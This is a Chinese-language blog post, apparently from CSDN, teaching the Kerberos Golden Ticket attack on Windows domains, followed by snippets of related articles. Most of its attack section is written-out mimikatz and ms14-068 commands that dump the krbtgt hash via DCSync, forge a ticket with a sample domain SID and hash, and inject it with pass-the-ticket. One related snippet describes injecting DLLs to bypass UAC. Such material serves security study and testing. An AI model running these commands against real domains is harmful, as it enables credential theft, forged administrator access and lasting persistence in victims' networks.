域内横向渗透-PTT票据传递之黄金票据 (Golden Ticket)

已于 2022-09-27 11:52:50 修改
阅读量485 收藏
点赞数 1
分类专栏: 内网安全 文章标签: 哈希算法 算法
于 2022-09-22 19:09:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62783065/article/details/126992766
版权

域内横向渗透-PTT票据传递之黄金票据 Golden Ticket


链接: 域内横向渗透-PTT票据传递之kerberos认证原理详解

原理

在上文kerberos认证中,认证第一步通过AS认证后,AS 会给 Client 一个
Logon Session Key 和 TGT,而 Logon Session Key 并不会保存在 KDC 中,krbtgt 的
NTLM Hash 又是固定的,所以只要得到 krbtgt 的 NTLM Hash,就可以伪造 TGT 和
Logon Session Key 来进入下一步 Client 与 TGS 的交互。而已有了金票后,就跳过 AS 验证,即跳过kerberos第一部分验证,不用验证账户和密码,所以也不担心域管密码修改。
特点:不需要与 AS 进行交互,需要用户 krbtgt 的 Hash 。
在这里插入图片描述

利用

可以用MS14-068提权漏洞利用工具以及mimikatz工具配合使用,或者直接利用mimikatz进行票据传递。

利用条件

伪造金票的所需条件
1、 域名称
2、 域的 SID 值
3、 域的 KRBTGT 账号的 HASH
4、 伪造任意用户名

使用方法

ms14-068提权与mimikatz

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址
上述命令会生成一个伪造凭证到当前目录。
使用 mimikatz 清空之前缓存的凭证,导入伪造的凭证。
之后使用mimikatz:
mimikatz # kerberos::purge //清空票据
mimikatz # kerberos::ptc 票据文件地址

mimikatz提取krbtgt hash

mimikatz(commandline) # privilege::debug
mimikatz(commandline) # lsadump::dcsync /domain:moonhack.com /all /csv 或lsadump::lsa /inject
mimikatz(commandline) # lsadump::dcsync /domain:moonhack.com /user:krbt gt
mimikatz.exe “privilege::debug” “lsadump::dcsync /domain:moonsec.fbi /a ll /csv” “exit”>loghash.txt
利用 mimikatz 生成金票生成.kirbi 文件并保存:
mimikatz.exe “kerberos::golden /admin:system /domain:moonhack.com /sid: S-1-5-21-3439616436-2844000184-3841763578 /krbtgt:4c1d57638dddb470a8588 af80160f5f6 /ticket:ticket.kirbi” exit
/admin:伪造的用户名
/domain:域名称
/sid:SID值,注意是去掉最后一个-后面的值
/krbtgt:krbtgt的HASH值
/ticket:生成的票据名称 //不是写入内存中的命令!

金票的使用

登录域内普通用户,通过 mimikatz 中的 kerberos::ptt 功能将 ticket.kirbi 导入内存中。导入票据之前访问域控。
mimikatz # kerberos::purge
mimikatz # kerberos::ptt 票据路径

webfker from 0 to 1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[渗透测试笔记] 49.渗透黄金票据和白银票据
H4ppyD0g的博客
03-17 4569
Kerberos认证协议 《信息系统安全概论》书中对kerberos协议流程做了简化,如下所示 在此用下图做说明 KDC(密钥分发中心)包含身份认证服务器和服务审批服务器(用于票据授权服务TGS) DC是控制器;AD是活动目录。 DC中有一个特殊用户叫做:krbtgt,它是一个无法登录的账户,是在创建时系统自动创建的,在整个kerberos认证中会多次用到它的Hash值去做验证。 AD会维护一个Account Database(账户数据库). 它存储了中所有用户的密码Hash和白名单。只有账户密码
权限维持-黄金票据
m0_64815693的博客
06-04 234
权限维持-黄金票据
渗透黄金票据
ClarkAlbert的博客
10-29 1468
渗透黄金票据前言:1.黄金票据的原理和条件(1)原理(2)条件2.黄金票据的局限性3.绕过黄金票据局限性4.黄金票据的特点5.黄金票据防御6.实践 前言: 在了解黄金票据前,首先要清楚keberos协议,目前在windows中采用的认证协议就是kerberos。(参考链接:https://blog.csdn.net/wy_97/article/details/87649262) 1.黄金票据的原理和条件 (1)原理 黄金票据伪造的是票据授予票据(TGT),TGT=krbtgt hash(session
黄金票据攻击
Aquariusqsmy的博客
04-02 871
通过这种方法,攻击者可以生成有效的TGT Kerberos票据,且这些票据不受TGT生命周期的影响(TGT默认生命周期为10小时,最多可续订7天)。在Windows系统中,攻击者还可以利用已获得的权限或漏洞进行票据提权,进一步提升自己的权限并获取黄金票据。具体来说,黄金票据攻击可以为任意用户生成TGT票据,这意味着攻击者甚至可以为管理员生成TGT,从而使普通用户获得管理员的权限。:SID(安全标识符)是唯一的,用于标识Windows操作系统中的安全主体(如用户账户、组账户等)。
黄金票据——渗透
include_voidmain的博客
03-14 620
0x01前言 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。攻击者一旦拿到管权限的账号就可以伪造出黄金票据,逃过账号和密码的验证,即使修改管理员密码,攻击者依然能通过黄金票据进行访问。 0x02原理 kerberos认证中Client通过AS认证后,AS会给Client一个由Client的Master Key加密过的和TGT,Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到NTLM就能伪造TGT和Logon session key,
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
m0_62207170的博客
05-18 897
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
渗透之(黄金票据利用)
cj_Hydra's Blog
02-13 2832
前言: 这里先介绍下Kerberos协议: Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。 在Kerberos协议中主要是有三个角色的存在: 1:访问服务的Client(用户的机器客户端) 2:提供服务的Server(服务端) 3:KDC(Key Distribution Center)密钥分发中心其中K...
第68天:内网安全-横向PTH&PTK&PTT哈希票据传递1
08-03
2.mimikatz # kerberos::purge 3.利用 ms14-068 生成 TGT 数据 4.票据注入内存 5.查看凭证列表 klist 6.利
ptt-crawler:ptt 爬虫(ptt crawler) implement by golang
04-19
爬虫 plang爬虫工具by golang 演示链接: : 演示屏幕截图:
uPtt:uPtt Messenger - Ptt 开源通讯软体
05-16
uPtt Messenger 是一个以Ptt 为基础的开源通讯软体,试图解决长久以来Ptt 水球指令繁复与多人聊天难以使用的问题。 更不需要为了等信与讯息一直不断的看PTT uPtt Messenger 让这些事情都变得简单 欢迎各位开发者实...
CrawlerTutorial:爬虫极简教学(获取,解析,搜索,多处理,API)-PTT这样
02-05
随着PTT Web改版加入了很多原本BBS才有的功能,本教学也同步更新〜教学如何让爬虫学会新把戏! 尚未完成... :face_with_tears_of_joy: 本著作由制作,以释出。 概述 相关专案: :通过Dcard API抓取/下载资料的高...
SMART-PTT.apk
09-22
卓智达是一款基于安卓平台的公网对讲软件,稳定好用,便捷。利用安卓平台通过手机无线网络来实现全国对讲,方便实用。
内网渗透--黄金票据
yc的博客
05-23 1725
渗透-----黄金票据的使用 前言 今天主要学习内容为黄金票据的制作,黄金票据主要是权限维持,因为经验少,所以一直不明白一个问题,就是在制作黄金票据时候需要KRBTGT的hash,KRBTGT的hash需要控权限,而且每张黄金票据制作后仅可维持十个小时,那么黄金票据的主要作用是什么?是hw时管理员突然改控密码,此时黄金票据可以维持权限、继续渗透嘛? Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由Kerberos帐户(KRBTGT)加密和签名的。TGT仅用于向控制器上的KD
权限维持-渗透攻击-Golden Ticket (黄金票据)
weixin_43227251的博客
04-13 1603
Golden Ticket (黄金票据) 简义 : 在拥有普通用户权限和 krbtgt账号的hash的情况下,获取管理员权限。 发生在上面的过程3,可以伪造TGT(前提是获取krbtgt账号的口令散列值(hash)),宣称自己是内任何账号,包括管或者不存在的用户。 1. 首先,黄金票据是全功能的TGT。也就意味着万能票据可用于Kerberos认证的任何服务。票据授予服务盲目地相信TGT中的信息,然后处理TGT并颁发服务票据。 内存中插入黄金票据并不需要提升权限。而且默认情况下,黄金票据的有效期是10
渗透之银票据学习
cxk
06-10 1092
票据(silver ticket):它不需要和控制器进行通信,原理是伪造TGS,使用的是计算机账户的hash进行加密的,所以只能访问指定的权限,也就是只能访问特定的服务。 0x01 银票据利用条件 控计算机账户的ntlm hash 中的sid值 一台中主机 与其说是一种攻击方式,不如说是一种后门,当控权限掉后,再重新获取权限。 0x02 实战 环境 控2k3,ip:192.168.5...
渗透黄金票据与白银票据
dys的博客
07-19 468
黄金票据和白银票据 kerberos协议
渗透之金票据学习
cxk
04-28 1486
票据golden ticket):伪造票据授予票据(TGT),也被称为认证票据。 krbtgt账户:每个控制器都有一个“krbtgt”的用户账户,是KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。 0x01金票据利用条件 控中krbtgt账户NTLM密码哈希 中的sid值 一台中主机 与其说是一种攻击方式,不如说是一种后门,当控权限掉后,再重新获取权限。 0x02实战 环...
利用黄金票据获取控权限
qq_54713392的博客
06-30 460
利用黄金票据获取控权限 (1)在控服务器上用mimikatz获取krbtgt的sid和ntlm 提权执行命令:privilege::debug 获取用户krbtgt的信息执行命令lsadump::dcsync /domain:demo.com /user:krbtgt (2)获取krbtgt的sid和ntlm(这里尤其注意要去掉502) sid S-1-5-21-2189589203-2536092258-2850724310-502 ntlm c68811b401358f8d153cdb752e2
用户组成员 导出_渗透 | 黄金票据利用
weixin_39968820的博客
12-03 357
前几篇文章说了渗透中白银票据的利用等内容,接下来我们说一下黄金票据的利用方法。目录0x01 介绍0x02 实验0x03 局限性0x04 防御0x01 介绍大家再回忆一下认证的流程,白银票据是对认证中的ticket做了手脚,那认证的另一个关键点TGT能不能有什么利用的方法呢,如果有了TGT的话,我们就可以去请求服务的ticket,其实也是可以进行利用的,黄金票据就是在这个情况下利用的。我们先...
RXDNFuse复现
最新发布
05-01
RXDNFuse是一种用于绕过Windows用户账户控制(UAC)的技术,它可以使得普通用户获得管理员权限。这个技术是通过DLL注入来实现的。具体地说,它通过将恶意DLL注入到Windows系统进程中,并利用进程完整性级别低于管理员权限的漏洞,从而绕过UAC限制,获取系统管理员权限。 复现RXDNFuse技术需要具备一定的技术知识和实践经验。简单来说,复现RXDNFuse的过程包括以下几个步骤: 1. 寻找可注入的Windows系统进程; 2. 制作恶意DLL文件; 3. 利用工具或手动将恶意DLL注入到系统进程中; 4. 触发漏洞,使得恶意DLL被执行; 5. 获得管理员权限。 需要注意的是,复现RXDNFuse技术属于安全研究领,只能在合法授权和安全测试环境下进行。在未经授权的情况下使用该技术可能会触犯法律法规,造成不必要的后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

webfker from 0 to 1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值